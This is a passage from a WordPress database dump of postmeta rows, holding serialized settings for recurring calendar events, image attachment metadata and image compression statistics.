3:\"_EventVenueID\";i:1607512642;s:15:\"_EventStartDate\";i:1607512642;s:13:\"_EventEndDate\";i:1607512642;s:18:\"_EventStartDateUTC\";i:1607512642;s:16:\"_EventEndDateUTC\";i:1607512642;s:14:\"_EventDuration\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:18:\"_EventTimezoneAbbr\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;}'),(117374,262893,'_EventOrigin','events-calendar'),(117375,262893,'_edit_lock','1619292730:2'),(117376,262893,'_edit_last','2'),(151803,266081,'mec_more_info_target','_self'),(117378,262893,'_RTECregistrationsDisabled','1'),(117124,262884,'_EventShowMap','1'),(117082,262883,'protect_children',''),(117076,262883,'_EventStartDate','2021-01-10 12:15:00'),(117123,262884,'_EventShowMapLink','1'),(117077,262883,'_EventStartDateUTC','2021-01-10 19:15:00'),(117078,262883,'_EventEndDate','2021-01-10 13:45:00'),(117079,262883,'_EventEndDateUTC','2021-01-10 20:45:00'),(117080,262883,'_EventDuration','5400'),(117081,262883,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117083,262883,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117086,262883,'_RTECregistrationsDisabled','1'),(117087,262883,'_RTECdeadlineType','start'),(117088,262883,'_RTECwhoCanRegister','any'),(117089,262883,'_RTEClimitRegistrations','0'),(117090,262883,'_RTECmaxRegistrations','30'),(117084,262883,'_EventOrigin','events-calendar'),(117091,262883,'boldgrid_hide_page_title','0'),(117092,262883,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117093,262883,'_EventShowMapLink','1'),(117094,262883,'_EventShowMap','1'),(117095,262883,'_EventVenueID','262507'),(117096,262883,'_EventCurrencySymbol',''),(117097,262883,'_EventCurrencyPosition','prefix'),(117098,262883,'_EventCost',''),(117099,262883,'_EventURL',''),(117100,262883,'_EventTimezone','America/Denver'),(117101,262883,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117114,262884,'_EventOrigin','events-calendar'),(117121,262884,'boldgrid_hide_page_title','0'),(117112,262884,'protect_children',''),(117106,262884,'_EventStartDate','2021-02-14 12:15:00'),(117107,262884,'_EventStartDateUTC','2021-02-14 19:15:00'),(117108,262884,'_EventEndDate','2021-02-14 13:45:00'),(117109,262884,'_EventEndDateUTC','2021-02-14 20:45:00'),(117122,262884,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117110,262884,'_EventDuration','5400'),(117111,262884,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117113,262884,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117116,262884,'_RTECregistrationsDisabled','1'),(117117,262884,'_RTECdeadlineType','start'),(117118,262884,'_RTECwhoCanRegister','any'),(117119,262884,'_RTEClimitRegistrations','0'),(117120,262884,'_RTECmaxRegistrations','30'),(10563,120546,'_wp_attached_file','2019/08/splash-ek-logo-white-1.png'),(10564,120546,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:69;s:6:\"height\";i:68;s:4:\"file\";s:34:\"2019/08/splash-ek-logo-white-1.png\";s:5:\"sizes\";a:1:{s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"splash-ek-logo-white-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10566,120546,'_edit_lock','1565632452:2'),(10567,120663,'_wp_attached_file','2019/08/splash-ek-logo-white-2.png'),(10568,120663,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:79;s:6:\"height\";i:79;s:4:\"file\";s:34:\"2019/08/splash-ek-logo-white-2.png\";s:5:\"sizes\";a:1:{s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"splash-ek-logo-white-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10569,120663,'_edit_lock','1565636507:2'),(10885,126730,'_edit_lock','1595214703:2'),(10886,126730,'_edit_last','2'),(10887,126870,'_wp_attached_file','2019/08/404-page-pup-sorry.jpg'),(10888,126870,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:779;s:6:\"height\";i:478;s:4:\"file\";s:30:\"2019/08/404-page-pup-sorry.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"404-page-pup-sorry-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-250x153.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-550x337.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-293x180.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-489x300.jpg\";s:5:\"width\";i:489;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10889,126730,'_wp_page_template','default'),(10890,126730,'_wpac_members_redirect_to',''),(10891,126730,'_wpac_show_in_search','0'),(10892,126730,'_wpac_show_excerpt_in_search','0'),(10893,126730,'_wpac_nonmembers_redirect_to',''),(10894,126730,'boldgrid_hide_page_title','0'),(10895,126730,'boldgrid_in_page_containers','1'),(10896,126730,'bgseo_robots_index','index'),(10897,126730,'bgseo_robots_follow','follow'),(10912,127458,'_wp_attached_file','2019/08/404-page-pup-sorry-2.jpg'),(10913,127458,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:779;s:6:\"height\";i:478;s:4:\"file\";s:32:\"2019/08/404-page-pup-sorry-2.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"404-page-pup-sorry-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-250x153.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-550x337.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-293x180.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-489x300.jpg\";s:5:\"width\";i:489;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"404-page-pup-sorry-2-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11903,128250,'_EventOrigin','events-calendar'),(11904,128250,'_tribe_modified_fields','a:26:{s:12:\"_EventOrigin\";d:1566039279;s:13:\"_thumbnail_id\";d:1566039976;s:24:\"boldgrid_hide_page_title\";d:1566039279;s:16:\"_EventRecurrence\";d:1568546882;s:17:\"_EventShowMapLink\";d:1566039279;s:13:\"_EventShowMap\";d:1566039279;s:13:\"_EventVenueID\";d:1566039279;s:15:\"_EventStartDate\";d:1566039795;s:13:\"_EventEndDate\";d:1566039795;s:18:\"_EventStartDateUTC\";d:1566039795;s:16:\"_EventEndDateUTC\";d:1566039795;s:14:\"_EventDuration\";d:1566039795;s:20:\"_EventCurrencySymbol\";d:1566039279;s:22:\"_EventCurrencyPosition\";d:1566039279;s:10:\"_EventCost\";d:1566039279;s:9:\"_EventURL\";d:1566039279;s:14:\"_EventTimezone\";d:1566039279;s:18:\"_EventTimezoneAbbr\";d:1566039279;s:27:\"_EventNextPendingRecurrence\";d:1566620185;s:16:\"tribe_events_cat\";i:1566060879;s:12:\"_dp_original\";d:1566039279;s:10:\"_edit_last\";d:1566039349;s:10:\"post_title\";d:1566039349;s:12:\"post_content\";d:1566039795;s:11:\"post_status\";d:1566039795;s:31:\"_TribeEventsPRO_RecurrenceQueue\";d:1566039989;}'),(97137,128132,'_EventNextPendingRecurrence','2022-12-18 11:30:00'),(11906,128250,'_tribe_modified_fields','a:26:{s:12:\"_EventOrigin\";d:1566039279;s:13:\"_thumbnail_id\";d:1566039976;s:24:\"boldgrid_hide_page_title\";d:1566039279;s:16:\"_EventRecurrence\";d:1568546882;s:17:\"_EventShowMapLink\";d:1566039279;s:13:\"_EventShowMap\";d:1566039279;s:13:\"_EventVenueID\";d:1566039279;s:15:\"_EventStartDate\";d:1566039795;s:13:\"_EventEndDate\";d:1566039795;s:18:\"_EventStartDateUTC\";d:1566039795;s:16:\"_EventEndDateUTC\";d:1566039795;s:14:\"_EventDuration\";d:1566039795;s:20:\"_EventCurrencySymbol\";d:1566039279;s:22:\"_EventCurrencyPosition\";d:1566039279;s:10:\"_EventCost\";d:1566039279;s:9:\"_EventURL\";d:1566039279;s:14:\"_EventTimezone\";d:1566039279;s:18:\"_EventTimezoneAbbr\";d:1566039279;s:27:\"_EventNextPendingRecurrence\";d:1566620185;s:16:\"tribe_events_cat\";i:1566060879;s:12:\"_dp_original\";d:1566039279;s:10:\"_edit_last\";d:1566039349;s:10:\"post_title\";d:1566039349;s:12:\"post_content\";d:1566039795;s:11:\"post_status\";d:1566039795;s:31:\"_TribeEventsPRO_RecurrenceQueue\";d:1566039989;}'),(11368,128132,'_EventCost',''),(11369,128132,'_EventURL',''),(11370,128132,'_EventTimezone','America/Denver'),(11371,128132,'_EventTimezoneAbbr','MST'),(17878,129808,'_EventURL',''),(11336,128132,'_EventOrigin','events-calendar'),(11337,128132,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";d:1566037618;s:10:\"_edit_last\";d:1566037639;s:10:\"post_title\";i:1612002835;s:11:\"post_status\";d:1566039204;s:12:\"post_content\";i:1612002801;s:16:\"tribe_events_cat\";i:1613755840;s:13:\"_thumbnail_id\";i:1607506492;s:24:\"boldgrid_hide_page_title\";d:1566039204;s:16:\"_EventRecurrence\";i:1613730640;s:17:\"_EventShowMapLink\";d:1566039204;s:13:\"_EventShowMap\";d:1566039204;s:13:\"_EventVenueID\";i:1607446821;s:15:\"_EventStartDate\";i:1607446821;s:13:\"_EventEndDate\";i:1607446821;s:18:\"_EventStartDateUTC\";i:1607446821;s:16:\"_EventEndDateUTC\";i:1607446821;s:14:\"_EventDuration\";d:1566039204;s:20:\"_EventCurrencySymbol\";d:1566039204;s:22:\"_EventCurrencyPosition\";d:1566039204;s:10:\"_EventCost\";d:1566039204;s:9:\"_EventURL\";d:1566039204;s:14:\"_EventTimezone\";d:1566039204;s:18:\"_EventTimezoneAbbr\";i:1607442146;s:27:\"_EventNextPendingRecurrence\";i:1605968512;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730642;s:16:\"protect_children\";i:1579515870;s:26:\"_RTECregistrationsDisabled\";i:1606921410;s:17:\"_RTECdeadlineType\";i:1606921410;s:19:\"_RTECwhoCanRegister\";i:1606921410;s:23:\"_RTEClimitRegistrations\";i:1606921410;s:21:\"_RTECmaxRegistrations\";i:1606921410;s:22:\"_EventHideFromUpcoming\";i:1607503837;}'),(11338,128132,'_edit_lock','1619295614:2'),(11339,128132,'_edit_last','2'),(17873,129808,'_EventEndDateUTC','2019-09-28 01:30:00'),(17885,129808,'_edit_last','2'),(17872,129808,'_EventStartDateUTC','2019-09-28 01:00:00'),(82271,256903,'original-file','2020/01/purple-butterfly-updraft-pre-smush-original.jpg'),(82276,256903,'smush-complete','1'),(82277,256903,'smush-info','The file was compressed from 18.97 KB to 18.33 KB saving 3.38 percent using WP-Optimize'),(82278,256903,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19422;s:12:\"smushed-size\";i:18765;s:15:\"savings-percent\";d:3.38;}'),(82279,256901,'original-file','2020/01/girl-tree-island-updraft-pre-smush-original.jpg'),(82280,256901,'smush-complete','1'),(82281,256901,'smush-info','The file was compressed from 18.84 KB to 18.25 KB saving 3.15 percent using WP-Optimize'),(82282,256901,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19297;s:12:\"smushed-size\";i:18690;s:15:\"savings-percent\";d:3.15;}'),(82283,256902,'original-file','2020/01/pink-flower-beach-updraft-pre-smush-original.jpg'),(82284,256902,'smush-complete','1'),(82285,256902,'smush-info','The file was compressed from 20.59 KB to 19.78 KB saving 3.94 percent using WP-Optimize'),(82286,256902,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21086;s:12:\"smushed-size\";i:20255;s:15:\"savings-percent\";d:3.94;}'),(119366,262972,'_EventShowMapLink','1'),(119367,262972,'_EventShowMap','1'),(119368,262972,'_EventVenueID','262507'),(119369,262972,'_EventCurrencySymbol',''),(119370,262972,'_EventCurrencyPosition','prefix'),(119371,262972,'_EventCost',''),(119372,262972,'_EventURL',''),(119373,262972,'_EventTimezone','America/Denver'),(119374,262972,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(120265,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(119715,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRecurrence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(119730,262989,'_EventStartDate','2021-01-11 15:00:00'),(119732,262989,'_EventStartDateUTC','2021-01-11 22:00:00'),(116717,262869,'_EventShowMap','1'),(115139,262816,'_EventStartDate','2021-01-10 08:45:00'),(115140,262816,'_EventStartDateUTC','2021-01-10 15:45:00'),(116716,262869,'_EventShowMapLink','1'),(115141,262816,'_EventEndDate','2021-01-10 10:00:00'),(115142,262816,'_EventEndDateUTC','2021-01-10 17:00:00'),(115143,262816,'_EventDuration','4500'),(116739,262871,'_EventDuration','4500'),(116738,262871,'_EventEndDateUTC','2021-01-03 